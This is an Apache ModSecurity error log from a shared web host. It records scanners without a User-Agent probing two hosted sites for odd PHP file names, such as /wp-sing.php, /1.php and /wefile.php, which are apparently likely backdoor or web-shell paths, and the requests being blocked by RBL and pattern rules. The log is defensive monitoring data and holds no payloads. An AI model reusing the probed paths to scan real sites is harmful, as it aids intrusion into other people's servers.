[Tue May 26 16:35:11.746913 2026] [security2:error] [pid 808625:tid 808862] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ZjEl_SBaWibfDmphMgAAAGs"]
[Tue May 26 16:35:11.822868 2026] [security2:error] [pid 808625:tid 808838] [client 130.131.224.225:63311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahV-ZzEl_SBaWibfDmphVwAAAFM"]
[Tue May 26 16:35:11.822998 2026] [security2:error] [pid 808625:tid 808838] [client 130.131.224.225:63311] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahV-ZzEl_SBaWibfDmphVwAAAFM"]
[Tue May 26 16:35:11.853782 2026] [security2:error] [pid 808625:tid 808876] [client 20.151.117.104:35814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV-ZzEl_SBaWibfDmphWAAAAHk"]
[Tue May 26 16:35:11.853867 2026] [security2:error] [pid 808625:tid 808876] [client 20.151.117.104:35814] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV-ZzEl_SBaWibfDmphWAAAAHk"]
[Tue May 26 16:35:11.942332 2026] [security2:error] [pid 808625:tid 808757] [client 130.131.224.225:65136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-sing.php"] [unique_id "ahV-ZzEl_SBaWibfDmphWgAAAAI"]
[Tue May 26 16:35:11.942471 2026] [security2:error] [pid 808625:tid 808757] [client 130.131.224.225:65136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-sing.php"] [unique_id "ahV-ZzEl_SBaWibfDmphWgAAAAI"]
[Tue May 26 16:35:12.001648 2026] [security2:error] [pid 808625:tid 808783] [client 20.151.117.104:19166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV-aDEl_SBaWibfDmphXAAAABw"]
[Tue May 26 16:35:12.001752 2026] [security2:error] [pid 808625:tid 808783] [client 20.151.117.104:19166] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV-aDEl_SBaWibfDmphXAAAABw"]
[Tue May 26 16:35:12.132402 2026] [security2:error] [pid 808625:tid 808821] [client 130.131.224.225:62705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-links-opml.php"] [unique_id "ahV-aDEl_SBaWibfDmphYAAAAEI"]
[Tue May 26 16:35:12.132496 2026] [security2:error] [pid 808625:tid 808821] [client 130.131.224.225:62705] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-links-opml.php"] [unique_id "ahV-aDEl_SBaWibfDmphYAAAAEI"]
[Tue May 26 16:35:12.149364 2026] [security2:error] [pid 808625:tid 808796] [client 20.151.117.104:9763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV-aDEl_SBaWibfDmphYQAAACk"]
[Tue May 26 16:35:12.149493 2026] [security2:error] [pid 808625:tid 808796] [client 20.151.117.104:9763] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV-aDEl_SBaWibfDmphYQAAACk"]
[Tue May 26 16:35:12.286740 2026] [security2:error] [pid 808625:tid 808853] [client 130.131.224.225:64551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV-aDEl_SBaWibfDmphYgAAAGI"]
[Tue May 26 16:35:12.286856 2026] [security2:error] [pid 808625:tid 808853] [client 130.131.224.225:64551] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV-aDEl_SBaWibfDmphYgAAAGI"]
[Tue May 26 16:35:12.304213 2026] [security2:error] [pid 808625:tid 808865] [client 20.151.117.104:19161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV-aDEl_SBaWibfDmphYwAAAG4"]
[Tue May 26 16:35:12.304310 2026] [security2:error] [pid 808625:tid 808865] [client 20.151.117.104:19161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV-aDEl_SBaWibfDmphYwAAAG4"]
[Tue May 26 16:35:12.450669 2026] [security2:error] [pid 808625:tid 808768] [client 20.151.117.104:21035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV-aDEl_SBaWibfDmphZwAAAA0"]
[Tue May 26 16:35:12.450818 2026] [security2:error] [pid 808625:tid 808768] [client 20.151.117.104:21035] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV-aDEl_SBaWibfDmphZwAAAA0"]
[Tue May 26 16:35:12.452357 2026] [security2:error] [pid 808625:tid 808775] [client 130.131.224.225:64559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wmore1.php"] [unique_id "ahV-aDEl_SBaWibfDmphaAAAABQ"]
[Tue May 26 16:35:12.452440 2026] [security2:error] [pid 808625:tid 808775] [client 130.131.224.225:64559] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wmore1.php"] [unique_id "ahV-aDEl_SBaWibfDmphaAAAABQ"]
[Tue May 26 16:35:12.604388 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:27029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV-aDEl_SBaWibfDmphbAAAAAY"]
[Tue May 26 16:35:12.604486 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:27029] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV-aDEl_SBaWibfDmphbAAAAAY"]
[Tue May 26 16:35:12.635269 2026] [security2:error] [pid 808625:tid 808849] [client 130.131.224.225:62708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-access.php"] [unique_id "ahV-aDEl_SBaWibfDmphcAAAAF4"]
[Tue May 26 16:35:12.635354 2026] [security2:error] [pid 808625:tid 808849] [client 130.131.224.225:62708] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-access.php"] [unique_id "ahV-aDEl_SBaWibfDmphcAAAAF4"]
[Tue May 26 16:35:12.754487 2026] [security2:error] [pid 808625:tid 808805] [client 20.151.117.104:59375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/leaf.php"] [unique_id "ahV-aDEl_SBaWibfDmphcgAAADI"]
[Tue May 26 16:35:12.754574 2026] [security2:error] [pid 808625:tid 808805] [client 20.151.117.104:59375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/leaf.php"] [unique_id "ahV-aDEl_SBaWibfDmphcgAAADI"]
[Tue May 26 16:35:12.783843 2026] [security2:error] [pid 808625:tid 808771] [client 130.131.224.225:65122] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV-aDEl_SBaWibfDmphcwAAABA"]
[Tue May 26 16:35:12.783933 2026] [security2:error] [pid 808625:tid 808771] [client 130.131.224.225:65122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV-aDEl_SBaWibfDmphcwAAABA"]
[Tue May 26 16:35:12.784009 2026] [security2:error] [pid 808625:tid 808771] [client 130.131.224.225:65122] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV-aDEl_SBaWibfDmphcwAAABA"]
[Tue May 26 16:35:12.897850 2026] [security2:error] [pid 808625:tid 808762] [client 20.151.117.104:27065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahV-aDEl_SBaWibfDmphdAAAAAc"]
[Tue May 26 16:35:12.897993 2026] [security2:error] [pid 808625:tid 808762] [client 20.151.117.104:27065] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahV-aDEl_SBaWibfDmphdAAAAAc"]
[Tue May 26 16:35:12.922269 2026] [security2:error] [pid 808625:tid 808875] [client 130.131.224.225:63917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sbhu.php"] [unique_id "ahV-aDEl_SBaWibfDmpheAAAAHg"]
[Tue May 26 16:35:12.922396 2026] [security2:error] [pid 808625:tid 808875] [client 130.131.224.225:63917] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sbhu.php"] [unique_id "ahV-aDEl_SBaWibfDmpheAAAAHg"]
[Tue May 26 16:35:13.041393 2026] [security2:error] [pid 808625:tid 808770] [client 20.151.117.104:35787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV-aTEl_SBaWibfDmpheQAAAA8"]
[Tue May 26 16:35:13.041493 2026] [security2:error] [pid 808625:tid 808770] [client 20.151.117.104:35787] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV-aTEl_SBaWibfDmpheQAAAA8"]
[Tue May 26 16:35:13.114455 2026] [security2:error] [pid 808625:tid 808829] [client 130.131.224.225:63905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahV-aTEl_SBaWibfDmphegAAAEo"]
[Tue May 26 16:35:13.114601 2026] [security2:error] [pid 808625:tid 808829] [client 130.131.224.225:63905] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahV-aTEl_SBaWibfDmphegAAAEo"]
[Tue May 26 16:35:13.185799 2026] [security2:error] [pid 808625:tid 808838] [client 20.151.117.104:25815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahV-aTEl_SBaWibfDmphfgAAAFM"]
[Tue May 26 16:35:13.185950 2026] [security2:error] [pid 808625:tid 808838] [client 20.151.117.104:25815] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahV-aTEl_SBaWibfDmphfgAAAFM"]
[Tue May 26 16:35:13.205960 2026] [security2:error] [pid 808625:tid 808870] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-aDEl_SBaWibfDmphawAAAHM"]
[Tue May 26 16:35:13.265033 2026] [security2:error] [pid 808625:tid 808876] [client 130.131.224.225:63239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file30.php"] [unique_id "ahV-aTEl_SBaWibfDmphfwAAAHk"]
[Tue May 26 16:35:13.265125 2026] [security2:error] [pid 808625:tid 808876] [client 130.131.224.225:63239] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file30.php"] [unique_id "ahV-aTEl_SBaWibfDmphfwAAAHk"]
[Tue May 26 16:35:13.328815 2026] [security2:error] [pid 808625:tid 808846] [client 20.151.117.104:32417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws38.php"] [unique_id "ahV-aTEl_SBaWibfDmphgAAAAFs"]
[Tue May 26 16:35:13.328920 2026] [security2:error] [pid 808625:tid 808846] [client 20.151.117.104:32417] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws38.php"] [unique_id "ahV-aTEl_SBaWibfDmphgAAAAFs"]
[Tue May 26 16:35:13.437418 2026] [security2:error] [pid 808625:tid 808757] [client 130.131.224.225:64570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/yellow.php"] [unique_id "ahV-aTEl_SBaWibfDmphhAAAAAI"]
[Tue May 26 16:35:13.437530 2026] [security2:error] [pid 808625:tid 808757] [client 130.131.224.225:64570] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/yellow.php"] [unique_id "ahV-aTEl_SBaWibfDmphhAAAAAI"]
[Tue May 26 16:35:13.472823 2026] [security2:error] [pid 808625:tid 808867] [client 20.151.117.104:35806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahV-aTEl_SBaWibfDmphhQAAAHA"]
[Tue May 26 16:35:13.472927 2026] [security2:error] [pid 808625:tid 808867] [client 20.151.117.104:35806] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahV-aTEl_SBaWibfDmphhQAAAHA"]
[Tue May 26 16:35:13.529191 2026] [fcgid:warn] [pid 808625:tid 808776] (70014)End of file found: [client 64.62.156.108:44630] mod_fcgid: can't get data from http client
[Tue May 26 16:35:13.618545 2026] [security2:error] [pid 808625:tid 808880] [client 130.131.224.225:62676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/reze.php"] [unique_id "ahV-aTEl_SBaWibfDmphhwAAAH0"]
[Tue May 26 16:35:13.618645 2026] [security2:error] [pid 808625:tid 808880] [client 130.131.224.225:62676] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/reze.php"] [unique_id "ahV-aTEl_SBaWibfDmphhwAAAH0"]
[Tue May 26 16:35:13.624980 2026] [security2:error] [pid 808625:tid 808796] [client 20.151.117.104:2136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/classsmtps.php"] [unique_id "ahV-aTEl_SBaWibfDmphiAAAACk"]
[Tue May 26 16:35:13.625050 2026] [security2:error] [pid 808625:tid 808796] [client 20.151.117.104:2136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/classsmtps.php"] [unique_id "ahV-aTEl_SBaWibfDmphiAAAACk"]
[Tue May 26 16:35:13.759946 2026] [security2:error] [pid 808625:tid 808834] [client 130.131.224.225:63879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahV-aTEl_SBaWibfDmphigAAAE8"]
[Tue May 26 16:35:13.760043 2026] [security2:error] [pid 808625:tid 808834] [client 130.131.224.225:63879] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahV-aTEl_SBaWibfDmphigAAAE8"]
[Tue May 26 16:35:13.774716 2026] [security2:error] [pid 808625:tid 808844] [client 20.151.117.104:2174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahV-aTEl_SBaWibfDmphiwAAAFk"]
[Tue May 26 16:35:13.774793 2026] [security2:error] [pid 808625:tid 808844] [client 20.151.117.104:2174] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahV-aTEl_SBaWibfDmphiwAAAFk"]
[Tue May 26 16:35:13.886130 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:63288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xda.php"] [unique_id "ahV-aTEl_SBaWibfDmphjwAAAE4"]
[Tue May 26 16:35:13.886248 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:63288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xda.php"] [unique_id "ahV-aTEl_SBaWibfDmphjwAAAE4"]
[Tue May 26 16:35:13.923859 2026] [security2:error] [pid 808625:tid 808868] [client 20.151.117.104:32406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/CDX1.php"] [unique_id "ahV-aTEl_SBaWibfDmphkAAAAHE"]
[Tue May 26 16:35:13.923953 2026] [security2:error] [pid 808625:tid 808868] [client 20.151.117.104:32406] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/CDX1.php"] [unique_id "ahV-aTEl_SBaWibfDmphkAAAAHE"]
